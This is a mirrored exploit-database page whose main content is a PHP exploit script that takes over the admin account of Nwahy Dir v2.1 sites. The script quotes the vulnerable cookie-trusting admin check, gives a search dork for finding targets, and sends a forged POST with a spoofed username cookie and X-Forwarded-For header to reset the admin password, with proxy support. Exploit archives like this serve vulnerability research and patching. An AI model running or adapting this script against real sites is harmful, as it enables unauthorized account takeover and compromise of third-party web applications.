bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/9087.php
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

150 lines
3.7 KiB
PHP
Executable file
Raw Blame History

<?
/*
[ Nwahy Dir v2.1 Change Admin Password Exploit ]
[-] Author : rEcruit
[-] Mail : recru1t[@]ymail.com
[-] Download : http://nwahy.com/showdownload-3105.html
[-] Vuln in ./admincp/admininfo.php
[code]
$u = addslashes($_COOKIE['username']);
$query = mysql_query ("SELECT * FROM `dlil_admin` WHERE username='$u' AND adminoruser='0'") or die ("Query failed");
$counts = mysql_num_rows($query);
if($counts == 0){
echo "<div align='center'>......................</div>";
}else{
[/code]
[-] Works On :
1. Nwahy Articles v1
2. Nwahy scripts v1
3. Nwahy book v1
[-] Note : Path to Control Panel "/admincp/" .
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function Usage()
{
print "\n\n";
print "/------------------------------------------------------------\\\n";
print "| Nwahy Dir v2.1 Change Admin Password Exploit |\n";
print "\------------------------------------------------------------/\n";
print "| [-] Author : rEcruit |\n";
print "| [-] Mail : recru1t@ymail.com |\n";
print "| [-] Greetz : RAGE SCREAM , SAUDI L0rD , Fantastic Egypt |\n";
print "\------------------------------------------------------------/\n";
print "| [-] Dork : Nwahy.com 2.1 , inurl:'add-site.html' |\n";
print "| [+] Usage : php Exploit.php HOST PATH Options |\n";
print "| [-] HOST : Target server (ip/hostname) |\n";
print "| [-] PATH : Path to Nwahy Dir |\n";
print "| [-] Options : |\n";
print "| =>Proxy :(ex. 0.0.0.0:8080) |\n";
print "\------------------------------------------------------------/\n";
print "\n\n";
exit;
}
function Send()
{
Global $host,$path,$user,$pwd,$proxy;
if(empty($proxy))
{
$Connect = @fsockopen($host,"80") or die("[-] Bad Host .");
}else{
$proxy = explode(":",$proxy);
$Connect = @fsockopen($proxy[0],$proxy[1]) or die("[-] Bad Proxy .");
}
$Payload = "username={$user}&password={$pwd}";
$Packet .= "POST {$path}/admincp/admininfo.php?action=edit HTTP/1.1 \r\n";
$Packet .= "Host: {$host}\r\n";
$Packet .= "Cookie: username={$user}\r\n";
$Packet .= "X-Forwarded-For: 127.0.0.1\r\n";
$Packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$Packet .= "Content-Length: ".(strlen($Payload))."\r\n";
$Packet .= "Connection: close\r\n\r\n";
$Packet .= $Payload;
fputs($Connect,$Packet);
while(!feof($Connect))
$Response .= @fgets($Connect,2048);
fclose($Connect);
return $Response;
}
function Login()
{
$Response = @Send();
if(eregi("refresh",$Response))
{
$msg = "[-] Password changed .\n";
}
elseif(eregi("<div align='center'>",$Response))
{
$msg = "[-] Bad username .\n";
}
else
{
$msg = "[-] Exploit failed .\n";
}
return $msg;
}
if ($argc < 3) Usage();
$host = $argv[1];
$path = $argv[2];;
$proxy = $argv[3];
Print "\r\n[-] Connecting to {$host} .... \r\n";
while(1)
{
Print "[-] Username: ";
if($user = str_replace (" ", "%20", trim(fgets(STDIN))))
{
Print "[-] New password: ";
if($pwd = str_replace (" ", "%20", trim(fgets(STDIN))))
{
Print Login();
exit;
}
}
} //end while
?>
# milw0rm.com [2009-07-09]
Reference in a new issue View git blame Copy permalink